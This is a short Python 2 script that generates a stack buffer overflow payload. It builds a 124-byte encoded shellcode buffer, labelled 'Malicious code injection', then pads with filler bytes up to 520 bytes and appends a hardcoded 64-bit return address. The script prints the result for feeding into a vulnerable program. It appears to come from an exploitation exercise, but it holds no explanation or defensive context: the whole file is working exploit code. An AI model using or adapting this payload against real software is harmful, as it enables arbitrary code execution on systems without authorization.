#!/usr/bin/python
# Payload generator
## Total payload length
payload_length = 520
## Amount of nops
nop_length = 0
## Controlled memory address to return to in Little Endian format
## 0x7fffffffe0e0
return_address = '\xe0\xe0\xff\xff\xff\x7f\x00\x00'
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection - 124 bytes
buf = ""
buf += "\xeb\x27\x5b\x53\x5f\xb0\xe5\xfc\xae\x75\xfd\x57\x59"
buf += "\x53\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66"
buf += "\x81\x3f\xcd\x10\x74\x07\x80\x3e\xe5\x75\xea\xeb\xe6"
buf += "\xff\xe1\xe8\xd4\xff\xff\xff\x04\xe5\x6e\x2d\x5c\x9d"
buf += "\x6e\x06\x5b\x6e\x05\x5a\x0b\x01\x4c\x93\x4c\xbd\x06"
buf += "\x04\x15\x58\x7b\x04\x04\x05\x55\x4c\x8d\xe2\x6e\x14"
buf += "\x5e\x6e\x2e\x5c\x0b\x01\x6e\x07\x5a\x4c\xfb\xca\x6e"
buf += "\x25\x5c\x0b\x01\x71\xf2\x6e\x3f\x5c\x9d\x4c\xbf\x2b"
buf += "\x66\x6d\x6a\x2b\x77\x6c\x04\x57\x4c\x8d\xe3\x56\x53"
buf += "\x4c\x8d\xe2\x0b\x01\xcd\x10"

## Building the padding between buffer overflow start and return address
padding = 'C' * (payload_length - nop_length - len(buf))
print nop_slide + buf +  padding + return_address 
